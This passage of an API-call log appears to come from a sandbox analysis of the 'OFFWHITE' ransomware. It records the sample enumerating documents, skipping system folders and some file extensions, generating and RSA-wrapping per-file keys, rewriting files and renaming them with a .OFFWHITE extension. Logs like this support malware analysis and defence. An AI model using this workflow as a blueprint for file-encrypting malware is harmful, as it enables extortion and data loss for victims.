[0133.687] lstrcmpiW (lpString1="lohmqPwxW5c2V6W9W.docx", lpString2="windows") returned -1 [0133.687] lstrcmpiW (lpString1="lohmqPwxW5c2V6W9W.docx", lpString2="$recycle.bin") returned 1 [0133.687] lstrcmpiW (lpString1="lohmqPwxW5c2V6W9W.docx", lpString2="rsa") returned -1 [0133.687] lstrcmpiW (lpString1="lohmqPwxW5c2V6W9W.docx", lpString2="ntuser.dat") returned -1 [0133.687] lstrcmpiW (lpString1="lohmqPwxW5c2V6W9W.docx", lpString2="programdata") returned -1 [0133.687] lstrcmpiW (lpString1="lohmqPwxW5c2V6W9W.docx", lpString2="appdata") returned 1 [0133.687] lstrcmpiW (lpString1="lohmqPwxW5c2V6W9W.docx", lpString2="program files") returned -1 [0133.688] lstrcmpiW (lpString1="lohmqPwxW5c2V6W9W.docx", lpString2="program files (x86)") returned -1 [0133.688] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0133.688] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="lohmqPwxW5c2V6W9W.docx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lohmqPwxW5c2V6W9W.docx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lohmqPwxW5c2V6W9W.docx" [0133.688] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.688] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.688] PathFindExtensionW (pszPath="lohmqPwxW5c2V6W9W.docx") returned=".docx" [0133.688] lstrcmpiW (lpString1=".docx", lpString2=".exe") returned -1 [0133.688] lstrcmpiW (lpString1=".docx", lpString2=".log") returned -1 [0133.688] lstrcmpiW (lpString1=".docx", lpString2=".cab") returned 1 [0133.688] lstrcmpiW (lpString1=".docx", lpString2=".cmd") returned 1 [0133.688] lstrcmpiW (lpString1=".docx", lpString2=".com") returned 1 [0133.688] lstrcmpiW (lpString1=".docx", lpString2=".cpl") returned 1 [0133.688] lstrcmpiW (lpString1=".docx", lpString2=".ini") returned -1 [0133.688] lstrcmpiW (lpString1=".docx", lpString2=".dll") returned 1 [0133.688] lstrcmpiW (lpString1=".docx", lpString2=".url") returned -1 [0133.688] lstrcmpiW (lpString1=".docx", lpString2=".ttf") returned -1 [0133.688] lstrcmpiW (lpString1=".docx", lpString2=".mp3") returned -1 [0133.688] lstrcmpiW (lpString1=".docx", lpString2=".pif") returned -1 [0133.688] lstrcmpiW (lpString1=".docx", lpString2=".mp4") returned -1 [0133.688] lstrcmpiW (lpString1=".docx", lpString2=".OFFWHITE") returned -1 [0133.688] lstrcmpiW (lpString1=".docx", lpString2=".msi") returned -1 [0133.689] lstrcmpiW (lpString1="lohmqPwxW5c2V6W9W.docx", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.689] GetProcessHeap () returned 0x500000 [0133.689] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f7c8 [0133.689] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lohmqPwxW5c2V6W9W.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lohmqpwxw5c2v6w9w.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0133.689] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=100609) returned 1 [0133.689] GetProcessHeap () returned 0x500000 [0133.689] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.690] GetProcessHeap () returned 0x500000 [0133.690] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.690] GetProcessHeap () returned 0x500000 [0133.690] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.690] GetProcessHeap () returned 0x500000 [0133.690] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.690] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.690] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.690] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.690] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.690] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.690] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.690] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.690] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.690] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0133.690] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.691] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.691] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0133.691] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x18901, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.691] SetLastError (dwErrCode=0x0) [0133.691] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0133.824] GetLastError () returned 0x0 [0133.824] GetLastError () returned 0x0 [0133.824] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x18a01, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.824] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0133.824] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x18b01, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.825] WriteFile (in: hFile=0xb0, lpBuffer=0x53f7c8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f7c8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0133.825] GetProcessHeap () returned 0x500000 [0133.825] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x18901) returned 0x55a7b8 [0133.825] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.825] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x18901, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x18901, lpOverlapped=0x0) returned 1 [0133.831] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.831] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x18901, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x18901, lpOverlapped=0x0) returned 1 [0133.832] GetProcessHeap () returned 0x500000 [0133.832] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0133.832] CloseHandle (hObject=0xb0) returned 1 [0133.836] GetProcessHeap () returned 0x500000 [0133.837] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.837] GetProcessHeap () returned 0x500000 [0133.837] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.837] GetProcessHeap () returned 0x500000 [0133.837] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.837] GetProcessHeap () returned 0x500000 [0133.837] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.837] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lohmqPwxW5c2V6W9W.docx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lohmqPwxW5c2V6W9W.docx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lohmqPwxW5c2V6W9W.docx" [0133.837] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lohmqPwxW5c2V6W9W.docx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lohmqPwxW5c2V6W9W.docx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lohmqPwxW5c2V6W9W.docx.OFFWHITE" [0133.837] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lohmqPwxW5c2V6W9W.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lohmqpwxw5c2v6w9w.docx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lohmqPwxW5c2V6W9W.docx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lohmqpwxw5c2v6w9w.docx.offwhite")) returned 1 [0133.838] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52f48180, ftCreationTime.dwHighDateTime=0x1d5a3c8, ftLastAccessTime.dwLowDateTime=0xecc37690, ftLastAccessTime.dwHighDateTime=0x1d58ff5, ftLastWriteTime.dwLowDateTime=0xecc37690, ftLastWriteTime.dwHighDateTime=0x1d58ff5, nFileSizeHigh=0x0, nFileSizeLow=0xc93b, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="Lrut.xlsx", cAlternateFileName="LRUT~1.XLS")) returned 1 [0133.838] lstrcmpiW (lpString1="Lrut.xlsx", lpString2=".") returned 1 [0133.838] lstrcmpiW (lpString1="Lrut.xlsx", lpString2="..") returned 1 [0133.838] lstrcmpiW (lpString1="Lrut.xlsx", lpString2="...") returned 1 [0133.838] lstrcmpiW (lpString1="Lrut.xlsx", lpString2="windows") returned -1 [0133.838] lstrcmpiW (lpString1="Lrut.xlsx", lpString2="$recycle.bin") returned 1 [0133.838] lstrcmpiW (lpString1="Lrut.xlsx", lpString2="rsa") returned -1 [0133.838] lstrcmpiW (lpString1="Lrut.xlsx", lpString2="ntuser.dat") returned -1 [0133.838] lstrcmpiW (lpString1="Lrut.xlsx", lpString2="programdata") returned -1 [0133.838] lstrcmpiW (lpString1="Lrut.xlsx", lpString2="appdata") returned 1 [0133.838] lstrcmpiW (lpString1="Lrut.xlsx", lpString2="program files") returned -1 [0133.838] lstrcmpiW (lpString1="Lrut.xlsx", lpString2="program files (x86)") returned -1 [0133.838] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0133.838] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Lrut.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Lrut.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Lrut.xlsx" [0133.839] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.839] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.839] PathFindExtensionW (pszPath="Lrut.xlsx") returned=".xlsx" [0133.839] lstrcmpiW (lpString1=".xlsx", lpString2=".exe") returned 1 [0133.839] lstrcmpiW (lpString1=".xlsx", lpString2=".log") returned 1 [0133.839] lstrcmpiW (lpString1=".xlsx", lpString2=".cab") returned 1 [0133.839] lstrcmpiW (lpString1=".xlsx", lpString2=".cmd") returned 1 [0133.839] lstrcmpiW (lpString1=".xlsx", lpString2=".com") returned 1 [0133.839] lstrcmpiW (lpString1=".xlsx", lpString2=".cpl") returned 1 [0133.839] lstrcmpiW (lpString1=".xlsx", lpString2=".ini") returned 1 [0133.839] lstrcmpiW (lpString1=".xlsx", lpString2=".dll") returned 1 [0133.839] lstrcmpiW (lpString1=".xlsx", lpString2=".url") returned 1 [0133.839] lstrcmpiW (lpString1=".xlsx", lpString2=".ttf") returned 1 [0133.839] lstrcmpiW (lpString1=".xlsx", lpString2=".mp3") returned 1 [0133.839] lstrcmpiW (lpString1=".xlsx", lpString2=".pif") returned 1 [0133.839] lstrcmpiW (lpString1=".xlsx", lpString2=".mp4") returned 1 [0133.839] lstrcmpiW (lpString1=".xlsx", lpString2=".OFFWHITE") returned 1 [0133.839] lstrcmpiW (lpString1=".xlsx", lpString2=".msi") returned 1 [0133.839] lstrcmpiW (lpString1="Lrut.xlsx", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.839] GetProcessHeap () returned 0x500000 [0133.839] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f7d8 [0133.840] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Lrut.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lrut.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0133.840] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=51515) returned 1 [0133.840] GetProcessHeap () returned 0x500000 [0133.841] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.841] GetProcessHeap () returned 0x500000 [0133.841] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.841] GetProcessHeap () returned 0x500000 [0133.841] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.841] GetProcessHeap () returned 0x500000 [0133.841] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.841] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.841] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.841] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.841] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.841] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.841] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.841] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.841] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.841] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0133.842] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.842] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.842] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0133.842] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xc93b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.842] SetLastError (dwErrCode=0x0) [0133.842] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0133.844] GetLastError () returned 0x0 [0133.844] GetLastError () returned 0x0 [0133.844] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xca3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.844] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0133.844] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xcb3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.844] WriteFile (in: hFile=0xb0, lpBuffer=0x53f7d8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f7d8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0133.844] GetProcessHeap () returned 0x500000 [0133.844] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xc93b) returned 0x55a7b8 [0133.844] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.845] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xc93b, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0xc93b, lpOverlapped=0x0) returned 1 [0133.848] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.848] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xc93b, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0xc93b, lpOverlapped=0x0) returned 1 [0133.849] GetProcessHeap () returned 0x500000 [0133.849] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0133.849] CloseHandle (hObject=0xb0) returned 1 [0133.850] GetProcessHeap () returned 0x500000 [0133.851] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.851] GetProcessHeap () returned 0x500000 [0133.851] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.851] GetProcessHeap () returned 0x500000 [0133.851] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.851] GetProcessHeap () returned 0x500000 [0133.851] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.851] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Lrut.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Lrut.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Lrut.xlsx" [0133.851] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Lrut.xlsx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Lrut.xlsx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Lrut.xlsx.OFFWHITE" [0133.851] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Lrut.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lrut.xlsx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Lrut.xlsx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lrut.xlsx.offwhite")) returned 1 [0133.852] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacea75e0, ftCreationTime.dwHighDateTime=0x1d5e1b3, ftLastAccessTime.dwLowDateTime=0xada31650, ftLastAccessTime.dwHighDateTime=0x1d5e199, ftLastWriteTime.dwLowDateTime=0xada31650, ftLastWriteTime.dwHighDateTime=0x1d5e199, nFileSizeHigh=0x0, nFileSizeLow=0x16d8e, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="MqUmO01DR.odt", cAlternateFileName="MQUMO0~1.ODT")) returned 1 [0133.852] lstrcmpiW (lpString1="MqUmO01DR.odt", lpString2=".") returned 1 [0133.852] lstrcmpiW (lpString1="MqUmO01DR.odt", lpString2="..") returned 1 [0133.852] lstrcmpiW (lpString1="MqUmO01DR.odt", lpString2="...") returned 1 [0133.852] lstrcmpiW (lpString1="MqUmO01DR.odt", lpString2="windows") returned -1 [0133.852] lstrcmpiW (lpString1="MqUmO01DR.odt", lpString2="$recycle.bin") returned 1 [0133.852] lstrcmpiW (lpString1="MqUmO01DR.odt", lpString2="rsa") returned -1 [0133.852] lstrcmpiW (lpString1="MqUmO01DR.odt", lpString2="ntuser.dat") returned -1 [0133.852] lstrcmpiW (lpString1="MqUmO01DR.odt", lpString2="programdata") returned -1 [0133.852] lstrcmpiW (lpString1="MqUmO01DR.odt", lpString2="appdata") returned 1 [0133.853] lstrcmpiW (lpString1="MqUmO01DR.odt", lpString2="program files") returned -1 [0133.853] lstrcmpiW (lpString1="MqUmO01DR.odt", lpString2="program files (x86)") returned -1 [0133.853] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0133.853] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="MqUmO01DR.odt" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MqUmO01DR.odt") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MqUmO01DR.odt" [0133.853] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.853] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.853] PathFindExtensionW (pszPath="MqUmO01DR.odt") returned=".odt" [0133.853] lstrcmpiW (lpString1=".odt", lpString2=".exe") returned 1 [0133.853] lstrcmpiW (lpString1=".odt", lpString2=".log") returned 1 [0133.853] lstrcmpiW (lpString1=".odt", lpString2=".cab") returned 1 [0133.853] lstrcmpiW (lpString1=".odt", lpString2=".cmd") returned 1 [0133.853] lstrcmpiW (lpString1=".odt", lpString2=".com") returned 1 [0133.853] lstrcmpiW (lpString1=".odt", lpString2=".cpl") returned 1 [0133.853] lstrcmpiW (lpString1=".odt", lpString2=".ini") returned 1 [0133.853] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0133.853] lstrcmpiW (lpString1=".odt", lpString2=".url") returned -1 [0133.853] lstrcmpiW (lpString1=".odt", lpString2=".ttf") returned -1 [0133.853] lstrcmpiW (lpString1=".odt", lpString2=".mp3") returned 1 [0133.853] lstrcmpiW (lpString1=".odt", lpString2=".pif") returned -1 [0133.853] lstrcmpiW (lpString1=".odt", lpString2=".mp4") returned 1 [0133.853] lstrcmpiW (lpString1=".odt", lpString2=".OFFWHITE") returned -1 [0133.853] lstrcmpiW (lpString1=".odt", lpString2=".msi") returned 1 [0133.853] lstrcmpiW (lpString1="MqUmO01DR.odt", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.853] GetProcessHeap () returned 0x500000 [0133.854] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f7e8 [0133.854] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MqUmO01DR.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mqumo01dr.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0133.854] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=93582) returned 1 [0133.854] GetProcessHeap () returned 0x500000 [0133.854] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.854] GetProcessHeap () returned 0x500000 [0133.854] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.854] GetProcessHeap () returned 0x500000 [0133.855] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.855] GetProcessHeap () returned 0x500000 [0133.855] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.855] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.855] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.855] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.855] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.855] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.855] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.855] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.855] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.855] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0133.855] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.924] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.924] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0133.925] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x16d8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.925] SetLastError (dwErrCode=0x0) [0133.925] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0133.942] GetLastError () returned 0x0 [0133.942] GetLastError () returned 0x0 [0133.942] SetFilePointerEx (in: hFile=0xb0, 